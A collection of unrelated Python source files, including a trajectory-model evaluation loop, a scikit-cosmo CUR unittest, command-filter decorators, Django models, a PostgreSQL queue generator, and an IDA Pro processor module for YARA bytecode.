if model_name == "baseline":
args_net = {
"offsets":0,
"offsets_input":0,
"use_images":0
}
else:
checkpoint = torch.load(models_path)
args_net = checkpoint["args"]
model = args_net["model_name"]
net = None
if model == "rnn_mlp":
net = RNN_MLP(args_net)
elif model == "cnn_mlp":
net = CNN_MLP(args_net)
elif model == "social_attention":
net = SocialAttention(args_net)
elif model == "spatial_attention":
net = SpatialAttention(args_net)
elif model == "s2s_social_attention":
net = SocialAttention(args_net)
elif model == "s2s_spatial_attention":
net = S2sSpatialAtt(args_net)
# loading trained network
net.load_state_dict(checkpoint['state_dict'])
net = net.to(device)
net.eval()
scenes = test_scenes
set_type_test = evaluation_parameters["set_type_test"]
if set_type_test == "train":
scenes = train_scenes
elif set_type_test == "eval":
scenes = eval_scenes
elif set_type_test == "train_eval":
scenes = train_eval_scenes
times = 0 # sum time for every prediction
nb_samples = 0 # number of predictions
dir_name = parameters_project["evaluation_reports"] + "{}/".format(report_name)
sub_dir_name = parameters_project["evaluation_reports"] + "{}/scene_reports/".format(report_name)
if os.path.exists(dir_name):
os.system("rm -r {}".format(dir_name))
os.system("mkdir {}".format(dir_name))
if os.path.exists(sub_dir_name):
os.system("rm -r {}".format(sub_dir_name))
os.system("mkdir {}".format(sub_dir_name))
s = time.time()
for z,scene in enumerate(scenes):
sample_id = 0
print(scene)
scene_dict = {} # save every sample in the scene
# get dataloader
data_loader = helpers_evaluation.get_data_loader(parameters_project,data_file,scene,args_net,processed_parameters,evaluation_parameters)
sample_id = 0
print(time.time()-s)
for batch_idx, data in enumerate(data_loader):
inputs, labels,types,points_mask, active_mask,imgs,target_last,input_last = data
inputs = inputs.to(device)
labels = labels.to(device)
imgs = imgs.to(device)
b,n,_,_ = inputs.shape
if not args_net["offsets_input"]:
input_last = np.zeros_like(inputs.cpu().numpy())
outputs = labels
if model_name != "baseline":
# active mask for training, along batch*numbr_agent axis
active_mask = active_mask.to(device)
points_mask = list(points_mask)
# if not args_net["offsets_input"]:
# input_last = np.zeros_like(inputs.cpu().numpy())
start = time.time()
if not args_net["use_neighbors"]:
outputs,inputs,types,active_mask,points_mask = helpers_evaluation.predict_naive(inputs,types,active_mask,points_mask,net,device,imgs)
else:
if not args_net["joint_optimisation"]:
outputs,inputs,types,active_mask,points_mask = helpers_evaluation.predict_neighbors_disjoint(inputs,types,active_mask,points_mask,net,device)
else:
outputs = net((inputs,types,active_mask,points_mask,imgs))
end = time.time() - start
times += end
nb_samples += b*n
active_mask = helpers_evaluation.get_active_mask(points_mask[1])
points_mask = torch.FloatTensor(points_mask[1]).to(device)
outputs = torch.mul(points_mask,outputs)
labels = torch.mul(points_mask,labels) # bon endroit?
# active mask per sample in batch
if not args_net["offsets"]:
target_last = np.zeros_like(labels.detach().cpu().numpy())
for i,l,o,t,p, a, il, tl in zip(inputs, labels, outputs, types, points_mask,active_mask, input_last, target_last):
i = i[a].detach().cpu().numpy()
l = l[a].detach().cpu().numpy()
t = t[a]
p = p[a]
o = o[a].detach().cpu().numpy()
tl = tl[a]
il = il[a]
# revert offsets
i,l,o = helpers.offsets_to_trajectories( i,l,o,args_net["offsets"],args_net["offsets_input"],tl,il)
# apply active mask
scene_dict[sample_id] = {}
scene_dict[sample_id]["inputs"] = i.tolist()
scene_dict[sample_id]["labels"] = l.tolist()
scene_dict[sample_id]["outputs"] = o.tolist()
# scene_dict[sample_id]["active_mask"] = a.cpu().numpy().tolist()
scene_dict[sample_id]["types"] = t.tolist()
scene_dict[sample_id]["points_mask"] = p.cpu().numpy().tolist()
sample_id += 1
json.dump(scene_dict, open(sub_dir_name + "{}_samples.json".format(scene),"w"),indent= 0)
timer = {
"total_time":times,
"nb_trajectories":nb_samples,
"time_per_trajectory":times/nb_samples
}
# save the time
json.dump(timer, open(dir_name + "time.json","w"),indent= 0)
if __name__ == "__main__":
main()
|
66137
|
import unittest
import numpy as np
from sklearn import exceptions
# from sklearn.datasets import load_boston as load
from skcosmo.datasets import load_csd_1000r as load
from skcosmo.feature_selection import CUR
class TestCUR(unittest.TestCase):
def setUp(self):
self.X, _ = load(return_X_y=True)
def test_bad_transform(self):
selector = CUR(n_to_select=2)
with self.assertRaises(exceptions.NotFittedError):
_ = selector.transform(self.X)
def test_restart(self):
"""
This test checks that the model can be restarted with a new instance
"""
ref_selector = CUR(n_to_select=self.X.shape[-1] - 3).fit(X=self.X)
ref_idx = ref_selector.selected_idx_
selector = CUR(n_to_select=1)
selector.fit(self.X)
for i in range(self.X.shape[-1] - 3):
selector.n_to_select += 1
selector.fit(self.X, warm_start=True)
self.assertEqual(selector.selected_idx_[i], ref_idx[i])
def test_non_it(self):
"""
This test checks that the model can be run non-iteratively
"""
C = self.X.T @ self.X
_, UC = np.linalg.eigh(C)
ref_idx = np.argsort(-(UC[:, -1] ** 2.0))[:-1]
selector = CUR(n_to_select=self.X.shape[-1] - 1, iterative=False)
selector.fit(self.X)
self.assertTrue(np.allclose(selector.selected_idx_, ref_idx))
if __name__ == "__main__":
unittest.main(verbosity=2)
|
66204
|
def deny(blacklist):
"""
Decorates a handler to filter out a blacklist of commands.
The decorated handler will not be called if message.command is in the
blacklist:
@deny(['A', 'B'])
def handle_everything_except_a_and_b(client, message):
pass
Single-item blacklists may be passed as a string:
@deny('THIS')
def handle_everything_except_this(client, message):
pass
"""
blacklist = [blacklist] if isinstance(blacklist, str) else blacklist
def inner_decorator(handler):
def wrapped(client, message):
if message.command not in blacklist:
handler(client=client, message=message)
return wrapped
return inner_decorator
def allow(whitelist):
"""
Decorates a handler to filter all except a whitelist of commands
The decorated handler will only be called if message.command is in the
whitelist:
@allow(['A', 'B'])
def handle_only_a_and_b(client, message):
pass
Single-item whitelists may be passed as a string:
@allow('THIS')
def handle_only_this(client, message):
pass
"""
whitelist = [whitelist] if isinstance(whitelist, str) else whitelist
def inner_decorator(handler):
def wrapped(client, message):
if message.command in whitelist:
handler(client=client, message=message)
return wrapped
return inner_decorator
|
66225
|
import os
from shutil import copytree, copy2
from glob import glob
import torchvision
import torch
from tensorboardX import SummaryWriter
from sklearn import metrics
def copy_source_code(path):
if not os.path.isdir(path):
os.makedirs(path)
denylist = ["./__pycache__/"]
folders = glob(r'./*/')
# For copying python files
for file_ in glob(r'./*.py'):
copy2(file_, path)
# For copying json files
for file_ in glob(r'./*.json'):
copy2(file_, path)
for folder in folders:
if folder not in denylist:
# Remove first char which is . due to the glob
copytree(folder, path + folder[1:])
class LoggerUtils():
"""docstring for LoggerUtils"""
def __init__(self, config):
super(LoggerUtils, self).__init__()
log_path = config["log_path"]
tb_path = log_path + "/tensorboard"
if not os.path.exists(tb_path) or not os.path.isdir(tb_path):
os.mkdir(tb_path)
self.config = config
self.writer = SummaryWriter(tb_path)
def save_image_batch(self, batch_image, path):
torchvision.utils.save_image(batch_image, '{}/{}'.format(
self.config["log_path"], path), nrow=8, padding=2)
def save_model(self, model, path):
torch.save(model.state_dict(), path)
def log_model_stats(self, model):
pass
def log_console(self, message):
print(message)
def log_metrics(self, category, y_pred, y_true, iteration):
#self.log_scalar(category + "/metrics/roc_auc", metrics.roc_auc_score(y_true, y_pred), iteration)
#self.log_scalar(category + "/metrics/f1", metrics.f1_score(y_true, y_pred > 0.5), iteration)
#self.log_scalar(category + "/metrics/precision", metrics.precision_score(y_true, y_pred > 0.5), iteration)
#self.log_scalar(category + "/metrics/recall", metrics.recall_score(y_true, y_pred > 0.5), iteration)
#self.log_scalar(category + "/metrics/auprc", metrics.average_precision_score(y_true, y_pred), iteration)
pass
def log_scalar(self, category, value, iteration):
self.writer.add_scalar(category, value, iteration)
def log_histogram(self, category, vector, step):
self.writer.add_histogram(category, vector, step)
|
66242
|
from collections import (
defaultdict,
)
from contextlib import (
asynccontextmanager,
)
from datetime import (
datetime,
)
from typing import (
Iterable,
)
import psutil
from core.db_entities import (
DBTable,
DstDatabase,
)
from core.enums import (
TransferringStagesEnum,
)
from core.helpers import (
dates_list_to_str,
logger,
)
class StatisticManager:
def __init__(
self,
database: DstDatabase,
):
self._database = database
self._time_indications = defaultdict(list)
self._memory_usage_indications = defaultdict(list)
def set_indication_time(self, stage):
"""
Add stage indication time
Stage from TransferringStagesEnum
"""
self._time_indications[stage].append(datetime.now())
def set_indication_memory(self, stage):
"""
Add stage memory usage indication
"""
self._memory_usage_indications[stage].append(
dict(psutil.virtual_memory()._asdict())
)
def print_transferring_indications(self):
"""
Output transferring indications to log
"""
for stage in TransferringStagesEnum.values.keys():
if stage in self._time_indications:
logger.info(
f"{TransferringStagesEnum.values.get(stage)} --- "
f"{dates_list_to_str(self._time_indications[stage])}"
)
if stage in self._memory_usage_indications:
logger.info(
f"{TransferringStagesEnum.values.get(stage)} --- "
f"{self._memory_usage_indications[stage]}"
)
def print_records_transfer_statistic(self):
"""
Output transferred tables rows count
"""
tables: Iterable[DBTable] = self._database.tables.values()
tables_counts = {
table.name: (table.transferred_pks_count, len(table.need_transfer_pks))
for table in tables
}
sorted_tables_counts = (
sorted(tables_counts, key=lambda t_n: tables_counts[t_n][0])
)
for table_name in sorted_tables_counts:
logger.info(
f"{table_name} --- {tables_counts[table_name][0]} / "
f"{tables_counts[table_name][1]}"
)
@asynccontextmanager
async def statistic_indexer(
statistic_manager: StatisticManager,
stage: int,
):
"""
Statistic indexer context manager
"""
statistic_manager.set_indication_time(stage)
statistic_manager.set_indication_memory(stage)
yield
statistic_manager.set_indication_time(stage)
statistic_manager.set_indication_memory(stage)
|
66255
|
from a10sdk.common.A10BaseClass import A10BaseClass
class DiskUsage(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param disk_usage: {"type": "string", "format": "string"}
:param time: {"type": "number", "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "disk-usage"
self.DeviceProxy = ""
self.disk_usage = ""
self.time = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Oper(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param end_time: {"type": "number", "format": "number"}
:param start_time: {"type": "number", "format": "number"}
:param total_disk: {"type": "string", "format": "string"}
:param disk_usage: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"disk-usage": {"type": "string", "format": "string"}, "optional": true, "time": {"type": "number", "format": "number"}}}]}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "oper"
self.DeviceProxy = ""
self.end_time = ""
self.start_time = ""
self.total_disk = ""
self.disk_usage = []
for keys, value in kwargs.items():
setattr(self,keys, value)
class Disk(A10BaseClass):
"""Class Description::
Operational Status for the object disk.
Class disk supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/rrd/disk/oper`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "disk"
self.a10_url="/axapi/v3/rrd/disk/oper"
self.DeviceProxy = ""
self.oper = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
|
66259
|
import hashlib
import typing
from pg_sql import SqlId, SqlNumber, SqlObject, SqlString, sql_list
from .formats.join import JoinTable
from .join_common import Structure, context_column, foreign_column, local_column
from .join_key import KeyResolver
from .sql import SqlQuery, SqlTableExpr, table_fields, update_excluded
from .string import indent
def create_queue(
id: str,
table_id: str,
structure: Structure,
resolver: KeyResolver,
tables: typing.Dict[str, JoinTable],
context: typing.List[str],
):
table = tables[table_id]
dep = table.join
foreign_table = tables[dep]
if table.lock_id is not None:
lock_id = table.lock_id
else:
digest = hashlib.md5(f"{id}__{table_id}".encode("utf-8")).digest()
lock_id = int.from_bytes(digest[0:2], "big", signed=True)
lock_base = lock_id * (2 ** 48)
queue_table = structure.queue_table(table_id)
column_names = [column.name for column in table.key] if table.key else ["_"]
local_columns = [local_column(column) for column in column_names]
foreign_columns = [foreign_column(column) for column in table.join_key]
context_columns = [context_column(setting) for setting in context]
columns = (
[
f"{SqlObject(SqlId('l'), SqlId(column))} AS {local_column(column)}"
for column in column_names
]
+ [
f"{SqlObject(SqlId('f'), SqlId(column))} AS {foreign_column(column)}"
for column in table.join_key
]
+ [f"NULL::text AS {context_column(setting)}" for setting in context]
+ ["NULL::bigint AS seq", "NULL::bigint AS lock", "NULL::bigint AS count"]
)
yield f"""
CREATE TABLE {queue_table}
AS SELECT {sql_list(columns)}
FROM
{table.sql} AS l
CROSS JOIN {foreign_table.sql} AS f
WITH NO DATA
""".strip()
yield f"""
ALTER TABLE {queue_table}
ADD PRIMARY KEY ({sql_list(local_columns + context_columns)}),
ALTER count SET NOT NULL,
ALTER count SET DEFAULT 0,
ALTER lock ADD GENERATED BY DEFAULT AS IDENTITY,
ALTER lock SET NOT NULL,
ALTER seq ADD GENERATED BY DEFAULT AS IDENTITY,
ALTER seq SET NOT NULL
""".strip()
yield f"""
COMMENT ON TABLE {queue_table} IS {SqlString(f"Asynchronous processing of changes to {table.sql}")}
""".strip()
for column in column_names:
yield f"""
COMMENT ON COLUMN {queue_table}.{local_column(column)} IS {SqlString(f"{table.sql} key: {SqlId(column)}")}
"""
for column in table.join_key:
yield f"""
COMMENT ON COLUMN {queue_table}.{foreign_column(column)} IS {SqlString(f"{foreign_table.sql} iterator: {SqlId(column)}")}
"""
yield f"""
COMMENT ON COLUMN {queue_table}.seq IS 'Order to process'
""".strip()
yield f"""
COMMENT ON COLUMN {queue_table}.lock IS 'Lock ID (add to base value {lock_base})'
""".strip()
yield f"""
COMMENT ON COLUMN {queue_table}.count IS 'Count of records processed'
""".strip()
yield f"""
CREATE INDEX ON {queue_table} (seq)
""".strip()
foreign_key_table = SqlObject(SqlId("_foreign_key"))
item = SqlId("_item")
new_item = SqlId("_new_item")
new_fields = ["''" for _ in context] + ["0", "0", "_item.count + count(*) OVER ()"]
get_item = f"""
SELECT
{table_fields(item, local_columns)},
{table_fields(SqlId("k"), [SqlId(column) for column in table.join_key])},
{sql_list(new_fields)}
INTO _new_item
FROM {SqlObject(foreign_key_table)} AS k
ORDER BY {table_fields(SqlId("k"), table.join_key)} DESC
""".strip()
if table.join_on is not None:
join = f"""
JOIN (VALUES ({table_fields(item, local_columns)})) AS {SqlId(table_id)} ({sql_list(SqlId(col.name) for col in table.key)})
ON {table.join_on}
""".strip()
else:
join = ""
key1_query = f"""
SELECT {SqlId(dep)}.*
FROM {foreign_table.sql} AS {SqlId(dep)}
{join}
ORDER BY {sql_list(SqlObject(SqlId(dep), SqlId(name)) for name in table.join_key)}
LIMIT max_records
""".strip()
gather1 = resolver.sql(
foreign_key_table,
exprs=[SqlTableExpr(foreign_key_table, key1_query)],
last_expr=get_item,
)
key2_query = f"""
SELECT {SqlId(dep)}.*
FROM {foreign_table.sql} AS {SqlId(dep)}
{join}
WHERE ({table_fields(item, foreign_columns)}) < ({table_fields(SqlId(dep), (SqlId(column) for column in table.join_key))})
ORDER BY {sql_list(SqlObject(SqlId(dep), SqlId(name)) for name in table.join_key)}
LIMIT max_records
""".strip()
gather2 = resolver.sql(
foreign_key_table,
exprs=[SqlTableExpr(foreign_key_table, key2_query)],
last_expr=get_item,
)
context_vars = "\n".join(
f"{SqlId(f'_context_{setting}')} text := current_setting({SqlString(setting)}, true);"
for setting in context
)
set_context = "\n".join(
f"PERFORM set_config({SqlString(setting)}, _item.{context_column(setting)}, true);"
for setting in context
)
unset_context = "\n".join(
f"PERFORM set_config({SqlString(setting)}, {SqlId(f'_context_{setting}')}, true);"
for setting in context
)
process_function = structure.queue_process_function(table_id)
yield f"""
CREATE FUNCTION {process_function} (max_records bigint) RETURNS bool
LANGUAGE plpgsql AS $$
DECLARE
_item {queue_table};
_new_item {queue_table};
{context_vars}
BEGIN
-- find item
SELECT (q.*) INTO _item
FROM {queue_table} AS q
WHERE pg_try_advisory_xact_lock({lock_base} + q.lock)
ORDER BY q.seq
LIMIT 1;
IF _item IS NULL THEN
-- if no item found, exit
RETURN false;
END IF;
{indent(set_context, 2)}
IF ({table_fields(item, (foreign_column(column) for column in table.join_key))}) IS NULL THEN
-- if there is no iterator, start at the beginning
{indent(gather1, 3)}
ELSE
-- if there is an iterator, start at the iterator
{indent(gather2, 3)}
END IF;
IF _new_item IS NULL THEN
-- if the iterator was at the end, remove the queue item
DELETE FROM {queue_table} AS q
WHERE
({table_fields(SqlId("q"), local_columns + context_columns)}, q.seq)
= ({table_fields(item, local_columns + context_columns)}, _item.seq);
ELSE
-- update the queue item with the new iterator
UPDATE {queue_table} AS q
SET
{sql_list(f'{column} = (_new_item).{column}' for column in foreign_columns)},
count = _new_item.count,
seq = nextval(pg_get_serial_sequence({SqlString(str(queue_table))}, 'seq'))
WHERE
({table_fields(SqlId("q"), local_columns)}, q.seq)
= ({table_fields(item, local_columns)}, _item.seq);
END IF;
{indent(unset_context, 2)}
-- notify listeners that the queue has been updated
NOTIFY {SqlId(str(queue_table))};
RETURN true;
END;
$$
""".strip()
yield f"""
COMMENT ON FUNCTION {process_function} IS {SqlString(f"Refresh for {queue_table}")}
""".strip()
def enqueue_sql(
id: str,
context: typing.List[str],
table: JoinTable,
structure: Structure,
key_query: str,
exprs: typing.List[SqlTableExpr],
last_expr: typing.Optional[str],
):
queue_table = structure.queue_table(id)
column_names = [column.name for column in table.key] if table.key else ["_"]
local_columns = [local_column(column) for column in column_names]
context_columns = [context_column(setting) for setting in context]
if table.key:
order = (
f"ORDER BY {sql_list(SqlNumber(i + 1) for i, _ in enumerate(table.key))}"
)
else:
order = ""
if context:
settings = sql_list(
f"coalesce(current_setting({SqlString(f'context.{setting}')}, true), '')"
for setting in context
)
key_query = f"""
SELECT *, {settings}
FROM (
{indent(key_query, 1)}
) AS t
""".strip()
insert = f"""
INSERT INTO {queue_table} ({sql_list(local_columns + context_columns)})
{key_query}
{order}
ON CONFLICT ({sql_list(local_columns + context_columns)}) DO UPDATE
SET {update_excluded(foreign_column(column) for column in table.join_key)},
count = excluded.count,
seq = excluded.seq
""".strip()
query = SqlQuery(insert, expressions=exprs)
if last_expr is not None:
query.append(SqlId("_other"), last_expr)
return f"""
{query};
NOTIFY {SqlId(str(queue_table))};
""".strip()
|
66266
|
from django.db import models
from django.forms import ModelForm
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.core.validators import FileExtensionValidator
from .xmltools import analyze_file, include_sync_button
import uuid
def default_color():
return '#076AAB'
class Project(models.Model):
name = models.CharField(_("Name"), max_length=100)
picture = models.FileField(_("Picture"), null=True, blank=True)
description = models.CharField(_("Description"), max_length=200,
null=True, blank=True)
password = models.CharField(
_("Password"), max_length=50, null=True, blank=True)
pin = models.CharField(_("PIN"), max_length=6, unique=True)
id = models.UUIDField(_("Id"), primary_key=True,
default=uuid.uuid4, editable=False)
email = models.EmailField(_("Email"), null=True, blank=True)
@classmethod
def create_and_save(cls, name, picture, description):
proj = cls.objects.create(
name=name, picture=picture, description=description, password=password)
proj.save()
return proj
def __str__(self):
return self.name
class Meta:
verbose_name = _("Project")
verbose_name_plural = _("Projects")
class File(models.Model):
# Format: YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]
timestamp = models.DateTimeField(
_("Timestamp"), auto_now_add=True, auto_now=False)
project = models.ForeignKey(Project, on_delete=models.CASCADE)
# https://docs.djangoproject.com/en/dev/ref/models/fields/#django.db.models.ManyToManyField.symmetrical
ancestors = models.ManyToManyField("self", symmetrical=False)
description = models.CharField(_("Description"), max_length=200,
null=True, blank=True)
number_scripts = models.IntegerField(_("number_scripts"), default=0)
number_sprites = models.IntegerField(_("number_sprites"), default=0)
color = models.CharField(_("color"), max_length=7, default=default_color())
class Meta:
abstract = True
class SnapFile(File):
# validates only naming of file
file = models.FileField(_("File"), blank=True, validators=[
FileExtensionValidator(['xml', 'XML'])])
# thumbnail = models.ImageField(_("Thumbnail"), null=True, blank=True)
user = models.CharField(_("user"), max_length=30, null=True)
@classmethod
def create_and_save(cls, project, file, ancestors=None, user=None, description=''):
snap = cls.objects.create(
project=project, file=file, user=user, description=description)
if (ancestors):
snap.ancestors.set(ancestors)
snap.save()
return snap
def xml_job(self):
include_sync_button(self.get_media_path(),
proj_id=self.project.id, me=self.id)
stats = analyze_file(self.get_media_path())
self.number_scripts = stats[0]
self.number_sprites = stats[1]
self.save()
def as_dict(self):
ancestor_ids = [x.id for x in self.ancestors.all()]
file_url = settings.MEDIA_URL + str(self.file)
return {
'id': self.id,
'description': self.description,
'ancestors': ancestor_ids,
'file_url': file_url,
'timestamp': str(self.timestamp),
'number_scripts': self.number_scripts,
'number_sprites': self.number_sprites,
'color': self.color
}
def get_media_path(self):
return settings.MEDIA_URL + str(self.file)
class Meta:
verbose_name = _("SnapFile")
verbose_name_plural = _("SnapFiles")
class ProjectForm(ModelForm):
class Meta:
model = Project
fields = ['name', 'description', 'password', 'email']
labels = {
'description': _('Description (optional)'),
'password': _('Password (optional)'),
'email': _('email (optional), for restoring password and pin'),
}
class SnapFileForm(ModelForm):
class Meta:
model = SnapFile
fields = ['file', 'description']
labels = {
'file': _('File (optional)'),
'description': _('Description (optional)'),
}
|
66287
|
from idc import *
from idaapi import *
import idautils
YARA_OPERAND_SIZE = 8
YARA_RELOCATION_NULL_MAGIC = 0xfffaBADA
YARA_RELOCATION_END_MAGIC = 0xffffFFFF
UNDEFINED_MAGIC = 0xFFFABADAFABADAFF
def read_qw(self, insn, eaoffset):
qw = get_qword(insn.ea+eaoffset)
eaoffset += 8
return SIGNEXT(qw, 64), eaoffset
opcodes = [
('OP_ADD_M', 32, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_AND', 1, 0, []),
('OP_BITWISE_AND', 5, 0, []),
('OP_BITWISE_NOT', 4, 0, []),
('OP_BITWISE_OR', 6, 0, []),
('OP_BITWISE_XOR', 7, 0, []),
('OP_CALL', 15, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_string, 'type': o_mem}]),
('OP_CLEAR_M', 31, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_CONTAINS', 40, 0, []),
('OP_COUNT', 20, 0, []),
('OP_DBL_ADD', 126, 0, []),
('OP_DBL_DIV', 129, 0, []),
('OP_DBL_EQ', 120, 0, []),
('OP_DBL_GE', 125, 0, []),
('OP_DBL_GT', 123, 0, []),
('OP_DBL_LE', 124, 0, []),
('OP_DBL_LT', 122, 0, []),
('OP_DBL_MINUS', 130, 0, []),
('OP_DBL_MUL', 128, 0, []),
('OP_DBL_NEQ', 121, 0, []),
('OP_DBL_SUB', 127, 0, []),
('OP_ENTRYPOINT', 39, 0, []),
('OP_ERROR', 0, 0, []),
('OP_FILESIZE', 38, 0, []),
('OP_FOUND', 22, 0, []),
('OP_FOUND_AT', 23, 0, []),
('OP_FOUND_IN', 24, 0, []),
('OP_HALT', 255, CF_STOP, []),
('OP_IMPORT', 42, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_string, 'type': o_mem}]),
('OP_INCR_M', 30, CF_USE1, []),
('OP_INDEX_ARRAY', 19, 0, []),
('OP_INIT_RULE', 28, CF_USE1 | CF_USE2, [{'addr': read_qw, 'dtyp': dt_qword, 'type': o_mem}, {
'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_INT16', 241, 0, []),
('OP_INT16BE', 247, 0, []),
('OP_INT32', 242, 0, []),
('OP_INT32BE', 248, 0, []),
('OP_INT8', 240, 0, []),
('OP_INT8BE', 246, 0, []),
('OP_INT_ADD', 106, 0, []),
('OP_INT_DIV', 109, 0, []),
('OP_INT_EQ', 100, 0, []),
('OP_INT_GE', 105, 0, []),
('OP_INT_GT', 103, 0, []),
('OP_INT_LE', 104, 0, []),
('OP_INT_LT', 102, 0, []),
('OP_INT_MINUS', 110, 0, []),
('OP_INT_MUL', 108, 0, []),
('OP_INT_NEQ', 101, 0, []),
('OP_INT_SUB', 107, 0, []),
('OP_INT_TO_DBL', 11, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_JFALSE', 44, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_JLE', 37, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_JNUNDEF', 36, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_JTRUE', 45, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_qword, 'type': o_near}]),
('OP_LENGTH', 21, 0, []),
('OP_LOOKUP_DICT', 43, 0, []),
('OP_MATCHES', 41, 0, []),
('OP_MATCH_RULE', 29, CF_USE1, [{
'addr': read_qw, 'dtyp': dt_qword, 'type': o_mem}]),
('OP_MOD', 10, 0, []),
('OP_NOP', 254, 0, []),
('OP_NOT', 3, 0, []),
('OP_OBJ_FIELD', 18, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_string, 'type': o_mem}]),
('OP_OBJ_LOAD', 16, CF_USE1, [
{'addr': read_qw, 'dtyp': dt_string, 'type': o_mem}]),
('OP_OBJ_VALUE', 17, 0, []),
('OP_OF', 26, 0, []),
('OP_OFFSET', 25, 0, []),
('OP_OR', 2, 0, []),
('OP_POP', 14, 0, []),
('OP_POP_M', 33, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_PUSH', 13, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_PUSH_M', 34, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_PUSH_RULE', 27, CF_USE1, [{
'addr': read_qw, 'dtyp': dt_qword, 'type': o_mem}]),
('OP_SHL', 8, 0, []),
('OP_SHR', 9, 0, []),
('OP_STR_EQ', 140, 0, []),
('OP_STR_GE', 145, 0, []),
('OP_STR_GT', 143, 0, []),
('OP_STR_LE', 144, 0, []),
('OP_STR_LT', 142, 0, []),
('OP_STR_NEQ', 141, 0, []),
('OP_STR_TO_BOOL', 12, 0, []),
('OP_SWAPUNDEF', 35, CF_USE1, [
{'value': read_qw, 'dtyp': dt_qword, 'type': o_imm}]),
('OP_UINT16', 244, 0, []),
('OP_UINT16BE', 250, 0, []),
('OP_UINT32', 245, 0, []),
('OP_UINT32BE', 251, 0, []),
('OP_UINT8', 243, 0, []),
('OP_UINT8BE', 249, 0, []),
]
def SIGNEXT(x, b):
m = 1 << (b - 1)
x = x & ((1 << b) - 1)
return (x ^ m) - m
class YaraProc(processor_t):
id = 0x8000 + 0x080
flag = PR_ADJSEGS | PRN_HEX
cnbits = 8
dnbits = 8
psnames = ["yara"]
plnames = ["yara"]
segreg_size = 0
instruc_start = 0
assembler = {
'header': [".rule"],
"flag": AS_NCHRE | ASH_HEXF0 | ASD_DECF0 | ASO_OCTF0 | ASB_BINF0 | AS_NOTAB,
"uflag": 0,
"name": "y-a-r-a",
"origin": ".org",
"end": ".end",
"cmnt": ";",
"ascsep": '"',
"accsep": "'",
"esccodes": "\"'",
"a_ascii": ".ascii",
"a_byte": "db",
"a_word": "dw",
"a_dword": "dd",
"a_qword": "dq",
"a_bss": "dfs %s",
"a_seg": "seg",
"a_curip": "PC",
"a_public": "",
"a_weak": "",
"a_extrn": ".extern",
"a_comdef": "",
"a_align": ".align",
"lbrace": "(",
"rbrace": ")",
"a_mod": "%",
"a_band": "&",
"a_bor": "|",
"a_xor": "^",
"a_bnot": "~",
"a_shl": "<<",
"a_shr": ">>",
"a_sizeof_fmt": "size %s",
}
def notify_auto_empty(self):
"""
will open up entry point in disassembly window
"""
ep = get_entry(get_entry_ordinal(0))
Jump(ep)
return 1
@staticmethod
def setup_reloc_references(codeseg='.text', relocseg='.reloc'):
reloc_seg = get_segm_by_name(relocseg)
code_seg = get_segm_by_name(codeseg)
reloc_references = {}
start = reloc_seg.startEA
cur = start
while cur < reloc_seg.endEA:
MakeDword(cur)
target = get_dword(cur)
if target == YARA_RELOCATION_END_MAGIC:
break
cur += 4
offset = get_dword(target)
if offset == YARA_RELOCATION_NULL_MAGIC:
patch_dword(target, 0)
else:
# true means code, otherwise data ref
reloc_references[target] = offset, code_seg.startEA <= offset < code_seg.endEA
return reloc_references
def emu_operand(self, op, insn, feature, opidx):
operand_ea = insn.ea+1+8*opidx
if op.type == o_mem:
dreftype = dr_R
if op.dtyp == dt_string and op.addr != 0:
dreftype = dr_T
make_ascii_string(op.addr, 0, ASCSTR_C)
add_dref(insn.ea, op.addr, dreftype)
elif op.type == o_near:
n = '@_{}'.format(op.addr if get_word(
op.addr) != 0xfffe else 'exit')
MakeNameEx(op.addr, n, SN_AUTO)
add_cref(insn.ea, op.addr, fl_JN)
elif op.type == o_imm:
if op.value == UNDEFINED_MAGIC or op.value == UNDEFINED_MAGIC & 0xFFFFffff:
# OpEnum(insn.ea, op.n, GetConstByName('YARA_CONST'))
pass # TODO: figure out how to show it
def notify_emu(self, insn):
feature = insn.get_canon_feature()
for i in range(3): # max operand count
oprnd = insn[i]
if oprnd.type == o_void:
break # no more operands
self.emu_operand(oprnd, insn, feature, i)
if not feature & CF_STOP:
add_cref(insn.ea, insn.ea + insn.size, fl_F)
return True
def notify_out_operand(self, ctx, op):
if op.type == o_near:
r = ctx.out_name_expr(op, op.addr, BADADDR)
return True
if op.type == o_imm:
# TODO: check for UNDEFINED value
ctx.out_value(op, OOFW_64) # vm operands are always qwords
return True
if op.type == o_mem:
r = ctx.out_name_expr(op, op.addr, BADADDR)
return True
return False
def notify_out_insn(self, ctx):
feature = ctx.insn.get_canon_feature()
